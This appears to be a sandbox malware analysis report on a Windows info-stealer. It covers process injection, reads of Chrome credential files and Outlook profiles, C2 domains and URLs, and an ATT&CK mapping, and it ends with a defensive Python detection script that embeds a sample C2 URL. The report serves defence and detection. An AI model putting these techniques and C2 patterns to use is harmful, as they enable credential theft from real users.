          Source: C:\Users\user\Desktop\SC_0017384.exe | Queries volume information: C:\Users\user\Desktop\SC_0017384.exe VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\Desktop\SC_0017384.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\Desktop\SC_0017384.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

Remote Access Functionality

Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.SC_0017384.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.575645185.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430971378.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577052861.0000000004CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.577203879.0000000004D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

One row per tactic column of the report's matrix, techniques in the order the matrix lists them. A leading number reproduces the count the report renders beside a technique; techniques without a number are the unmarked cells of the matrix template.

Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services
Execution: 1 Shared Modules | 1 PowerShell | At (Linux) | At (Windows) | Cron | Launchd | Scheduled Task
Persistence: 1 Registry Run Keys / Startup Folder | Boot or Logon Initialization Scripts | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items
Privilege Escalation: 612 Process Injection | 1 Registry Run Keys / Startup Folder | Logon Script (Windows) | Logon Script (Mac) | Network Logon Script | Rc.common | Startup Items
Defense Evasion: 1 Disable or Modify Tools | 11 Deobfuscate/Decode Files or Information | 2 Obfuscated Files or Information | 1 Software Packing | 1 Masquerading | 31 Virtualization/Sandbox Evasion | 612 Process Injection
Credential Access: 1 OS Credential Dumping | 1 Input Capture | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync
Discovery: 1 File and Directory Discovery | 13 System Information Discovery | 121 Security Software Discovery | 2 Process Discovery | 31 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 Remote System Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management
Collection: 1 Archive Collected Data | 1 Data from Local System | 1 Email Collection | 1 Input Capture | Keylogging | GUI Input Capture | Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Command and Control: 4 Ingress Tool Transfer | 11 Encrypted Channel | 5 Non-Application Layer Protocol | 16 Application Layer Protocol | Fallback Channels | Multiband Communication | Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication | Exploit SS7 to Redirect Phone Calls/SMS | Exploit SS7 to Track Device Location | SIM Card Swap | Manipulate Device Communication | Jamming or Denial of Service | Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization | Remotely Wipe Data Without Authorization | Obtain Device Cloud Backups
Impact: Modify System Partition | Device Lockout | Delete Device Data | Carrier Billing Fraud | Manipulate App Store Rankings or Ratings | Abuse Accessibility Features | Data Encrypted for Impact
Behavior Graph

Behavior Graph ID: 831200 | Sample: SC_0017384.exe | Start date: 21/03/2023 | Architecture: WINDOWS | Score: 100

Process tree recovered from the graph text. Node numbers are in parentheses, the bracketed numbers are the counters the graph draws beside a node, and the dropped-file paths are elided exactly as the graph elides them.

Start (2)
    DNS: www.funhood.life
    Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
    SC_0017384.exe (11) [16 7] started
        Network: a.uguu.se 188.40.83.211, port 443 (source ports 49698, 49700), HETZNER-ASDE Germany
        Dropped: C:\Users\user\AppData\...\Lvdnyvcvr.exe (PE32); C:\Users\...\Lvdnyvcvr.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\SC_0017384.exe.log (ASCII)
        Signatures: Encrypted powershell cmdline option found; Injects a PE file into a foreign processes
        SC_0017384.exe (16) started
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            explorer.exe (21) [6 5] injected
                Network: www.emprendizajesocial.com 217.160.0.229, port 80 (source ports 49703, 49704), ONEANDONE-ASBrauerstrasse48DE Germany; www.findmyoriginstory.com 74.208.236.131, port 80 (source port 49702), ONEANDONE-ASBrauerstrasse48DE United States; 5 other IPs or domains
                Signatures: System process connects to network (likely due to code injection or exploit)
                Lvdnyvcvr.exe (27) [14 4] started
                    Network: a.uguu.se
                    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Encrypted powershell cmdline option found
                    powershell.exe (35) started
                        conhost.exe (43) started
                    Lvdnyvcvr.exe (37) started
                systray.exe (31) [13] started
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process
                Lvdnyvcvr.exe (33) started
                    Network: 192.168.2.1 unknown unknown; a.uguu.se
                    Signatures: Injects a PE file into a foreign processes
                    powershell.exe (39) started
                        conhost.exe (45) started
                    Lvdnyvcvr.exe (41) started
        powershell.exe (19) [16] started
            conhost.exe (25) started
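The report's "Stealing of Sensitive Information" entries (the injected systray.exe opening Chrome's Cookies, Web Data, Login Data and Local State files and the Outlook profile key) and the behavior graph's "System process connects to network" finding, together with the /t4np/ C2 URLs in the URL tables further down, translate directly into host-side detection logic. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of any vendor's tooling. It runs three rules over a constructed, Sysmon-like event list whose field names (EventType, Image, TargetFilename, TargetObject, Url) are assumptions, as are the browser/mail allow-lists and the set of shell binaries that should never originate HTTP themselves.

```python
"""Detection rules for the stealer behaviour this report attributes to the
injected systray.exe / explorer.exe.

Added example, not part of the Joe Sandbox report. The event layout is a
constructed Sysmon-like dict format; field names and allow-lists are
assumptions to be adapted to the telemetry actually in use.
"""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Chrome files the report shows systray.exe opening (lower-cased basenames).
CHROME_SECRET_FILES = {"login data", "cookies", "web data", "local state"}
CHROME_USER_DATA = "\\google\\chrome\\user data\\"
# Outlook MAPI profile key the report lists under "Tries to steal Mail credentials".
OUTLOOK_PROFILE_KEY = "\\windows messaging subsystem\\profiles\\outlook"

# Assumed allow-lists: processes that legitimately touch those artefacts.
BROWSER_PROCS = {"chrome.exe"}
MAIL_PROCS = {"outlook.exe"}
# Assumed: the Windows shell binaries that were injection targets in this
# report and should not be originating HTTP requests themselves.
NO_HTTP_SYSTEM_PROCS = {"explorer.exe", "systray.exe"}
WINDOWS_DIR = "c:\\windows\\"

# Shape of the C2 GET requests in the report's URL table:
# http://<host>/<4 chars>/?<k>=<v>&<k>=<long base64-like blob>
C2_PATH = re.compile(r"^/[a-z0-9]{4}/$")
B64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class Alert:
    rule: str
    image: str
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_formbook_style_c2_url(url: str) -> bool:
    """Plain HTTP, one short directory, exactly two query parameters, one of
    them a long base64-like value. The query is split by hand so that '+' and
    '=' inside the blob survive (urllib.parse_qs would turn '+' into a space)."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not C2_PATH.match(parts.path):
        return False
    params = [p.split("=", 1) for p in parts.query.split("&") if p]
    if len(params) != 2 or any(len(p) != 2 for p in params):
        return False
    return any(B64ISH.match(value) for _, value in params)


def evaluate(events):
    """Apply the rules to Sysmon-like event dicts; return the alerts raised in order."""
    alerts = []
    for ev in events:
        image = ev["Image"]
        proc = _basename(image)
        kind = ev["EventType"]
        if kind == "FileOpen":
            target = ev["TargetFilename"]
            if (CHROME_USER_DATA in target.lower()
                    and _basename(target) in CHROME_SECRET_FILES
                    and proc not in BROWSER_PROCS):
                alerts.append(Alert("chrome_credential_store_read", image, target))
        elif kind == "RegOpen":
            key = ev["TargetObject"]
            if OUTLOOK_PROFILE_KEY in key.lower() and proc not in MAIL_PROCS:
                alerts.append(Alert("outlook_profile_key_read", image, key))
        elif kind == "NetConnect":
            url = ev["Url"]
            if image.lower().startswith(WINDOWS_DIR) and proc in NO_HTTP_SYSTEM_PROCS:
                alerts.append(Alert("system_process_outbound_http", image, url))
            if is_formbook_style_c2_url(url):
                alerts.append(Alert("formbook_style_c2_url", image, url))
    return alerts


# Constructed sample telemetry, built from paths and URLs quoted in the report.
SAMPLE_EVENTS = [
    {"EventType": "FileOpen", "Image": r"C:\Windows\SysWOW64\systray.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventType": "FileOpen", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"EventType": "RegOpen", "Image": r"C:\Windows\SysWOW64\systray.exe",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    {"EventType": "NetConnect", "Image": r"C:\Windows\explorer.exe",
     "Url": "http://www.emprendizajesocial.com/t4np/?LAIu=TchAG45&ekDWdXmx=gQIyGWpAOrsnJd0q1zycF3dboTDh0JHEHzF0+87QMzSWBZus6QBaVJZOvsOvWQQjPhLlWjZ0Xc16UyU8zopwRBvkYI23apdf5g=="},
    {"EventType": "NetConnect", "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "Url": "https://www.casar.com/assunto/organizacao/"},
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"{a.rule:30} {a.image} -> {a.detail}")
```

On the sample events the script raises four alerts (the Chrome read and Outlook key read by systray.exe, and both the system-process and C2-shape rules for explorer.exe) and stays silent for chrome.exe reading its own Login Data and for firefox.exe browsing. The URL rule deliberately does not hard-code the directory name t4np, which is campaign-specific; the structural shape (plain HTTP, four-character directory, a base64-like blob in one of two parameters) is what the report's URL table actually shows repeated across thirteen different domains, and pairing it with the system-process rule is what keeps false positives down on real telemetry.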

Source | Detection | Scanner | Label
SC_0017384.exe | 13% | ReversingLabs | Win32.Trojan.Woreflint
SC_0017384.exe | 18% | Virustotal |
SC_0017384.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe | 13% | ReversingLabs | Win32.Trojan.Woreflint

Source | Detection | Scanner | Label
3.2.SC_0017384.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
Source | Detection | Scanner | Label
www.madisoncountylincoln.com | 0% | Virustotal |
brunaeleandro.com | 0% | Virustotal |

Source | Detection | Scanner | Label
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe
https://a.uguu.se4Dp | 0% | Avira URL Cloud | safe
http://www.funhood.lifewww.funhood.life | 0% | Avira URL Cloud | safe
http://www.rw-bau.com/t4np/ | 0% | Avira URL Cloud | safe
http://www.madisoncountylincoln.com | 0% | Avira URL Cloud | safe
http://www.emprendizajesocial.com/t4np/ | 0% | Avira URL Cloud | safe
http://www.evelycosmetique.comwww.evelycosmetique.com | 0% | Avira URL Cloud | safe
http://www.brunaeleandro.comwww.brunaeleandro.com | 0% | Avira URL Cloud | safe
http://www.metatv.app | 0% | Avira URL Cloud | safe
http://www.groupekoriolis.com | 0% | Avira URL Cloud | safe
http://www.myprojoints.comwww.myprojoints.com | 0% | Avira URL Cloud | safe
http://www.groupekoriolis.com/t4np/ | 0% | Avira URL Cloud | safe
